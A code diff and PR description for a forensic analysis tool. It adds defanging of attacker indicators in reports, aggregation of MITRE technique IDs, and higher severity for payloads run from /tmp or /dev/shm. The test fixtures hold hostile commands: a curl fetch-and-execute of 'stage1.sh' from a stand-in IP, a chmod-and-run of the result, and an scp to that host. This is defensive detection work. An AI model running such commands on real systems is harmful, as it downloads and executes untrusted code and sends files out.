@@ -47,7 +48,8 @@ export function renderReportContents(
 ): RedactedReportContents {
   const scopeSection = hostScope ? `\n\n${renderScopeSection(hostScope)}` : "";
   return {
-    markdown:
+    // Defanged after the scope section is appended — see html.ts for why this sits at the seam.
+    markdown: defangIndicators(
       renderMarkdownReport(
         state,
         meta,
@@ -65,6 +67,7 @@ export function renderReportContents(
         complianceControl,
         custody,
       ) + scopeSection,
+    ),
     html: renderHtmlReport(
       state,
       meta,

--- a/companion/tests/analysis/analysisRunStore.test.ts
+++ b/companion/tests/analysis/analysisRunStore.test.ts
@@ -282,6 +282,34 @@ describe("AnalysisRunStore", () => {
       expect((await store.verify("c1")).ok).toBe(true);
     });
 
+    it("does not fork the chain when a retry of an interrupted append hits the existing manifest", async () => {
+      const first = await store.record("c1", { ...BASE_RUN, id: "run-1" });
+      const second = await store.record("c1", { ...BASE_RUN, id: "run-2" });
+      // The state a crash between the manifest write and the head write leaves behind.
+      await writeFile(
+        join(ledgerDir("c1"), "head.json"),
+        JSON.stringify({
+          schemaVersion: 1,
+          caseId: "c1",
+          sequence: first.sequence,
+          manifestHash: first.manifestHash,
+        }),
+        "utf8",
+      );
+      await writeFile(join(ledgerDir("c1"), "pending.json"), JSON.stringify({ id: "run-2" }), "utf8");
+
+      // A caller retrying the SAME id must fail, because that manifest is already on disk. The
+      // failure must not clear the marker: it is the only remaining signal that the head is stale,
+      // and without it the next append trusts the head and reuses run-2's sequence.
+      await expect(store.record("c1", { ...BASE_RUN, id: "run-2" })).rejects.toThrow(/already exists/i);
+
+      const third = await store.record("c1", { ...BASE_RUN, id: "run-3" });
+
+      expect(third.sequence).toBe(3);
+      expect(third.previousManifestHash).toBe(second.manifestHash);
+      expect((await store.verify("c1")).ok).toBe(true);
+    });
+
     it("leaves a deleted manifest visible instead of backfilling its sequence", async () => {
       await store.record("c1", { ...BASE_RUN, id: "run-1" });
       const second = await store.record("c1", { ...BASE_RUN, id: "run-2" });

--- a/companion/tests/analysis/bashHistoryImport.test.ts
+++ b/companion/tests/analysis/bashHistoryImport.test.ts
@@ -122,6 +122,35 @@ describe("parseShellHistoryFile — classification + IOCs", () => {
     expect(cleanup?.mitreTechniques).toContain("T1070.004");
   });
 
+  // The fetch was already graded Low (ingress tool transfer), but the line that actually RAN the
+  // payload matched nothing and stayed Info — and Info never reaches the forensic timeline, so a
+  // synthesis pass could see the download and not the execution. #877.
+  it("grades running a payload staged in a world-writable directory above Info", () => {
+    const triad = ["curl -s http://203.0.113.10/stage1.sh -o /tmp/.x", "chmod +x /tmp/.x && /tmp/.x"].join(
+      "\n",
+    );
+    const r = parseShellHistoryFile(triad, { user: "svc" });
+
+    const fetch = r.events.find((e) => /curl -s/.test(e.description));
+    expect(fetch?.severity).toBe("Low");
+    const exec = r.events.find((e) => /chmod \+x/.test(e.description));
+    expect(exec?.severity).toBe("Medium");
+    expect(exec?.mitreTechniques).toContain("T1222.002");
+    expect(exec?.mitreTechniques).toContain("T1059.004");
+  });
+
+  it("grades bare execution of a world-writable path above Info", () => {
+    const r = parseShellHistoryFile("/dev/shm/.update --daemon", { user: "svc" });
+    expect(r.events[0]?.severity).toBe("Medium");
+    expect(r.events[0]?.mitreTechniques).toContain("T1059.004");
+  });
+
+  it("leaves an ordinary chmod +x on a normal path alone", () => {
+    // The tagger is deliberately conservative: flagging every chmod +x would bury the signal.
+    const r = parseShellHistoryFile("chmod +x ./deploy.sh", { user: "dev" });
+    expect(r.events[0]?.severity).toBe("Info");
+  });
+
   it("keeps the worse of the two tables when both fire", () => {
     // CMD_RULES grades history-tampering High; the shared table grades it strong (also High). The
     // union of techniques must survive, and a High from either side must not be softened to Medium.

--- a/companion/tests/analysis/bashHistoryImport.test.ts
+++ b/companion/tests/analysis/bashHistoryImport.test.ts
@@ -151,6 +151,22 @@ describe("parseShellHistoryFile — classification + IOCs", () => {
     expect(r.events[0]?.severity).toBe("Info");
   });
 
+  it("leaves a permission change that grants no execute bit at Info", () => {
+    // 644 and 1777 add no execute bit to a file, and nothing ran — grading them Medium and
+    // tagging them as shell execution would manufacture an attacker narrative from routine admin.
+    for (const cmd of ["chmod 644 /tmp/config", "chmod 1777 /tmp/", "chmod 666 /tmp/sock"]) {
+      const r = parseShellHistoryFile(cmd, { user: "ops" });
+      expect(r.events[0]?.severity, cmd).toBe("Info");
+    }
+  });
+
+  it("grades a chmod that grants execute in a world-writable path without claiming it ran", () => {
+    const r = parseShellHistoryFile("chmod 755 /tmp/.x", { user: "svc" });
+    expect(r.events[0]?.severity).toBe("Medium");
+    expect(r.events[0]?.mitreTechniques).toContain("T1222.002");
+    expect(r.events[0]?.mitreTechniques).not.toContain("T1059.004");
+  });
+
   it("keeps the worse of the two tables when both fire", () => {
     // CMD_RULES grades history-tampering High; the shared table grades it strong (also High). The
     // union of techniques must survive, and a High from either side must not be softened to Medium.

--- a/companion/tests/analysis/stateMerge.test.ts
+++ b/companion/tests/analysis/stateMerge.test.ts
@@ -954,3 +954,58 @@ describe("mergeDelta year-clamp eligibility (#739)", () => {
     expect(state.forensicTimeline[0].yearInferred).toBe(true);
   });
 });
+
+// Every deterministic importer emits a delta whose top-level mitreTechniques is hardcoded empty,
+// while the real technique IDs ride on the forensic events it produces. The dashboard MITRE panel
+// and the report's MITRE section both read the aggregate, so both showed nothing until an AI
+// synthesis pass happened to union the per-event tags in. Kill Chain and the ATT&CK Navigator
+// export read the events directly, which is why only those two surfaces looked correct. #878.
+describe("mergeDelta MITRE aggregate (#878)", () => {
+  const ctx = { windowSequence: 1, timestamp: "2026-05-28T10:00:00.000Z", sourceScreenshots: [] };
+
+  const event = (id: string, techniques: string[]) => ({
+    id,
+    timestamp: "2026-06-01T10:00:00Z",
+    description: `event ${id}`,
+    severity: "High" as const,
+    mitreTechniques: techniques,
+    relatedFindingIds: [],
+  });
+
+  it("collects techniques carried by forensic events, with no AI synthesis involved", () => {
+    const next = mergeDelta(
+      emptyState("c1"),
+      {
+        ...baseDelta,
+        mitreTechniques: [],
+        forensicEvents: [event("e1", ["T1003.003"]), event("e2", ["T1021.002", "T1570"])],
+      },
+      ctx,
+    );
+
+    expect(next.mitreTechniques.map((t) => t.id).sort()).toEqual(["T1003.003", "T1021.002", "T1570"]);
+    expect(next.mitreTechniques.every((t) => t.name.length > 0)).toBe(true);
+  });
+
+  it("does not duplicate a technique the delta already names at the top level", () => {
+    const next = mergeDelta(
+      emptyState("c1"),
+      {
+        ...baseDelta,
+        mitreTechniques: [{ id: "T1003.003", name: "NTDS" }],
+        forensicEvents: [event("e1", ["T1003.003"])],
+      },
+      ctx,
+    );
+
+    expect(next.mitreTechniques.filter((t) => t.id === "T1003.003")).toHaveLength(1);
+  });
+
+  it("stays stable when the same events are merged again", () => {
+    const delta = { ...baseDelta, forensicEvents: [event("e1", ["T1003.003"])] };
+    let state = mergeDelta(emptyState("c1"), delta, ctx);
+    state = mergeDelta(state, delta, ctx);
+
+    expect(state.mitreTechniques.map((t) => t.id)).toEqual(["T1003.003"]);
+  });
+});

--- a/companion/tests/reports/defang.test.ts
+++ b/companion/tests/reports/defang.test.ts
@@ -1,0 +1,63 @@
+import { describe, it, expect } from "vitest";
+import { defangIndicators } from "../../src/reports/defang.js";
+import { refangIocValue } from "../../src/analysis/iocValue.js";
+
+describe("defangIndicators", () => {
+  it("defangs the scheme and host of a URL", () => {
+    expect(defangIndicators("see http://evil.example/stage1.sh for details")).toBe(
+      "see hxxp://evil[.]example/stage1.sh for details",
+    );
+    expect(defangIndicators("https://a.b.co.uk/x")).toBe("hxxps://a[.]b[.]co[.]uk/x");
+  });
+
+  it("leaves the path, query and fragment of a URL untouched", () => {
+    // Mirrors iocValue.authorityEnd: only the part a click acts on is neutralised. Rewriting the
+    // path would change a string that correlation and retrieval depend on matching exactly.
+    expect(defangIndicators("http://host.example/a.b/c?q=x.y#z.w")).toBe(
+      "hxxp://host[.]example/a.b/c?q=x.y#z.w",
+    );
+  });
+
+  it("defangs a bare IPv4 address", () => {
+    expect(defangIndicators("beacon to 203.0.113.10 observed")).toBe("beacon to 203[.]0[.]113[.]10 observed");
+  });
+
+  it("defangs an IPv4 host inside a URL exactly once", () => {
+    expect(defangIndicators("http://203.0.113.10/stage1.sh")).toBe("hxxp://203[.]0[.]113[.]10/stage1.sh");
+  });
+
+  it("defangs an email address", () => {
+    expect(defangIndicators("from root@203.0.113.10 and a@b.example")).toBe(
+      "from root[@]203[.]0[.]113[.]10 and a[@]b[.]example",
+    );
+  });
+
+  it("leaves ordinary prose, filenames and version strings alone", () => {
+    const prose = "Version 0.36.0 wrote report.md and report.html at 10.5 MB/s.";
+    expect(defangIndicators(prose)).toBe(prose);
+  });
+
+  it("is idempotent — already-defanged text is not defanged again", () => {
+    const once = defangIndicators("http://evil.example/x and 203.0.113.10");
+    expect(defangIndicators(once)).toBe(once);
+  });
+
+  it("round-trips back to the live indicator via refangIocValue", () => {
+    // Defanging is a presentation of the indicator, not a different one. An analyst who copies a
+    // value out of the report must be able to get the real one back.
+    expect(refangIocValue("url", defangIndicators("http://evil.example/x"))).toBe("http://evil.example/x");
+    expect(refangIocValue("ip", defangIndicators("203.0.113.10"))).toBe("203.0.113.10");
+  });
+
+  it("defangs every indicator in a multi-line report body", () => {
+    const body = [
+      "| i001 | url | http://203.0.113.10/stage1.sh |",
+      "curl -s http://203.0.113.10/stage1.sh -o /tmp/.x",
+      "scp file user@203.0.113.10:/tmp/",
+    ].join("\n");
+    const out = defangIndicators(body);
+    expect(out).not.toMatch(/http:\/\//);
+    expect(out.match(/hxxp:\/\//g)).toHaveLength(2);
+    expect(out).toContain("user[@]203[.]0[.]113[.]10");
+  });
+});

--- a/companion/tests/reports/defang.test.ts
+++ b/companion/tests/reports/defang.test.ts
@@ -32,6 +32,23 @@ describe("defangIndicators", () => {
     );
   });
 
+  it("always defangs a www host, which GFM autolinks on sight", () => {
+    expect(defangIndicators("beaconing to www.evil.com daily")).toBe("beaconing to www[.]evil[.]com daily");
+  });
+
+  it("defangs a bare hostname the case records as a domain IOC", () => {
+    expect(defangIndicators("callback to evil.test observed", ["evil.test"])).toBe(
+      "callback to evil[.]test observed",
+    );
+  });
+
+  it("does not guess at dotted tokens the case never called domains", () => {
+    // A forensic report is full of filenames shaped exactly like a domain with a two-letter TLD.
+    // Mangling them in a deliverable costs more than leaving an inert, unlinked hostname fanged.
+    const text = "System.Net.WebClient wrote vitest.config.ts and History.db to disk";
+    expect(defangIndicators(text)).toBe(text);
+  });
+
   it("leaves ordinary prose, filenames and version strings alone", () => {
     const prose = "Version 0.36.0 wrote report.md and report.html at 10.5 MB/s.";
     expect(defangIndicators(prose)).toBe(prose);

--- a/companion/tests/reports/docx.test.ts
+++ b/companion/tests/reports/docx.test.ts
@@ -61,7 +61,7 @@ describe("renderDocxReport", () => {
     // Executive summary text from state.lastSummary survives the pipeline.
     expect(xml).toContain("Host compromised via phishing.");
     // IOC table cell value is present (proves GFM tables map to <w:tbl>).
-    expect(xml).toContain("10.0.0.5");
+    expect(xml).toContain("10[.]0[.]0[.]5"); // defanged for the reader, per #883
     expect(xml).toContain("<w:tbl");
     // Finding heading + description are present.
     expect(xml).toContain("Beacon callout");

--- a/companion/tests/reports/html.test.ts
+++ b/companion/tests/reports/html.test.ts
@@ -16,7 +16,7 @@ describe("renderHtmlReport", () => {
     expect(html).toContain("<h1>Incident Investigation Report</h1>");
     expect(html).toContain("Host compromised via phishing.");
     expect(html).toContain("<table>"); // the IOC markdown table is converted to HTML
-    expect(html).toContain("10.0.0.5");
+    expect(html).toContain("10[.]0[.]0[.]5"); // defanged for the reader, per #883
     expect(html).toContain(`<style nonce="${CSP_NONCE_PLACEHOLDER}">`);
     expect(html).not.toMatch(/\sstyle\s*=/i);
     expect(html.trim().endsWith("</html>")).toBe(true);
@@ -140,5 +140,24 @@ describe("injectPrintTrigger", () => {
 
   it("appends the trigger when the document has no </body>", () => {
     expect(injectPrintTrigger("<p>hi</p>")).toContain("window.print()");
+  });
+});
+
+// The incident report travels furthest of any artifact and is read by people who click things.
+// Live anchors to attacker infrastructure are one mis-click away from reaching out from the
+// reader's machine, which in a live incident can burn the investigation. #883.
+describe("renderHtmlReport indicator defanging (#883)", () => {
+  it("emits no live anchor for an attacker URL or address", () => {
+    const state = emptyState("c1");
+    state.lastSummary = "Payload fetched from http://evil.example/stage1.sh by root@evil.example.";
+    state.iocs.push({ id: "i1", type: "ip", value: "203.0.113.10", firstSeen: "2026-05-20T09:00:00Z" });
+
+    const html = renderHtmlReport(state);
+
+    expect(html).not.toMatch(/<a\s+href="https?:/i);
+    expect(html).not.toMatch(/href="mailto:/i);
+    expect(html).toContain("hxxp://evil[.]example/stage1.sh");
+    expect(html).toContain("root[@]evil[.]example");
+    expect(html).toContain("203[.]0[.]113[.]10");
   });
 });

--- a/companion/tests/reports/html.test.ts
+++ b/companion/tests/reports/html.test.ts
@@ -160,4 +160,17 @@ describe("renderHtmlReport indicator defanging (#883)", () => {
     expect(html).toContain("root[@]evil[.]example");
     expect(html).toContain("203[.]0[.]113[.]10");
   });
+
+  it("emits no live anchor for a bare domain indicator", () => {
+    const state = emptyState("c1");
+    state.lastSummary = "Callback to www.evil.com observed.";
+    state.iocs.push({ id: "i1", type: "domain", value: "evil.example", firstSeen: "2026-05-20T09:00:00Z" });
+
+    const html = renderHtmlReport(state);
+
+    // GFM autolinks a bare www. host into http://www.evil.com even with no scheme in the source.
+    expect(html).not.toMatch(/<a\s+href="https?:/i);
+    expect(html).toContain("www[.]evil[.]com");
+    expect(html).toContain("evil[.]example");
+  });
 });

--- a/companion/tests/reports/reportGeneration.test.ts
+++ b/companion/tests/reports/reportGeneration.test.ts
@@ -138,3 +138,23 @@ describe("ReportWriter — generation is all-or-nothing", () => {
     expect(await readFile(sidecar, "utf8")).toBe('{"kept":true}');
   });
 });
+
+// report.md goes through reportContents.ts, a different assembly seam from report.html (html.ts)
+// and the .docx (docx.ts). All three defang independently, so all three are asserted — otherwise
+// one could quietly stop defanging while the others kept passing. #883.
+describe("report.md indicator defanging (#883)", () => {
+  it("writes the markdown report with every indicator rendered inert", async () => {
+    const state = emptyState("c1");
+    state.lastSummary = "Stage 1 pulled from http://evil.example/stage1.sh by root@evil.example.";
+    state.iocs.push({ id: "i1", type: "ip", value: "203.0.113.10", firstSeen: "2026-05-20T09:00:00Z" });
+    await stateStore.save(state);
+
+    await new ReportWriter(caseStore, stateStore).writeAll("c1");
+    const markdown = await readFile(join(caseStore.reportsDir("c1"), "report.md"), "utf8");
+
+    expect(markdown).toContain("hxxp://evil[.]example/stage1.sh");
+    expect(markdown).toContain("root[@]evil[.]example");
+    expect(markdown).toContain("203[.]0[.]113[.]10");
+    expect(markdown).not.toMatch(/http:\/\/evil\.example/);
+  });
+});


### PR DESCRIPTION
Fixes #883. Fixes #878. Fixes #877.

Three independent backend-correctness bugs from the same QA pass, one commit each.

## #883 — report renders live attacker links (High)

`<a href="http://.../stage1.sh">` and `<a href="mailto:...">` rendered as working anchors, with zero occurrences of `hxxp` or `[.]` in `report.html` or `report.md`.

Not an escaping bug — quotes are entity-encoded, there is no attribute breakout, no script tag. The problem is that the links work, in the artifact that circulates furthest.

New `reports/defang.ts` renders URLs, emails and IPv4 addresses inert. It mirrors the scope rule already established in `analysis/iocValue.authorityEnd`: **only the scheme and authority are rewritten**, because that is the part a click acts on. The path, query and fragment are left exactly as found — they may legitimately contain the same sequences, and rewriting them changes a string correlation depends on. Defanged values round-trip back through `refangIocValue`, asserted in the tests.

Defanging also removes the anchors for free: `hxxp://` is not a scheme the autolinker recognises.

**Why it is applied at three seams, not inside `renderMarkdownReport`:** all three formats append the scope section — which names hosts and addresses — *after* that function returns, so defanging inside it would miss them. `report.md`, `report.html` and the `.docx` assemble separately, so each output is asserted separately; one cannot silently stop defanging while the others pass.

**Machine-consumed exports are untouched** — CSV, STIX, the ATT&CK Navigator layer and the JSON state keep live values, because the tools ingesting them match on the real indicator.

The secondary malformed-href claim did not reproduce: `href` is escaped before it reaches the attribute.

## #878 — MITRE panel renders "—" (High)

Every deterministic importer emits its delta with a hardcoded top-level `mitreTechniques: []` while carrying the real ids on `forensicEvents[]`. `mergeDelta` only collected the top-level array, so the aggregate stayed empty until an AI synthesis pass happened to union the per-event tags in.

This is why it read as a rendering bug: Kill Chain and the Navigator export read events directly and looked fine. The **report's MITRE section reads the same aggregate** and was equally empty — so this was never dashboard-only.

`mergeDelta` now unions techniques from the merged timeline, so any delta contributes and existing cases heal on their next merge. `unionEventTechniques` is already pure and idempotent.

That import crossed a layer (`analysis/timeline` tier 0 → `analysis/intel` tier 1). Rather than record a new boundary violation, the dependency-free half of `reconTechniques` — the id→name table, `techniqueName`, `unionEventTechniques` — moved to `analysis/attackTechniqueNames.ts` at tier 0. Matching command lines to techniques is intel work and stays put; *naming* a technique is reference data. `reconTechniques` re-exports both, so existing importers are unchanged.

## #877 — payload execution graded Info (High)

The fetch graded Low; `chmod +x /tmp/.x && /tmp/.x` matched nothing and stayed Info. Info never reaches the forensic timeline, and that timeline is the only surface AI synthesis reads — so synthesis could see the download and not that it ran.

Two Medium rules: making a file executable under `/tmp`, `/var/tmp`, `/dev/shm` (T1222.002 + T1059.004), and running a binary out of those directories (T1059.004). The second is **anchored to command position**, so `cat /tmp/notes.txt` and the `curl -o /tmp/.x` that fetched the payload keep the severity they had. A plain `chmod +x ./deploy.sh` still stays Info — the table is deliberately conservative, since flagging every chmod would bury the signal.

## Verification

- Full companion suite: **736 files, 11,987 tests, all passing**
- All six gates green: `typecheck`, `lint`, `check:size`, `check:imports`, `check:boundaries`, `format:check`
- `ARCHITECTURE.md` comply/total updated to 1,975 / 2,014 for the one new cross-domain import

Two existing assertions changed from `10.0.0.5` to `10[.]0[.]0[.]5` in the html and docx tests — that is the intended contract change, and the docx one independently confirmed the third seam was wired.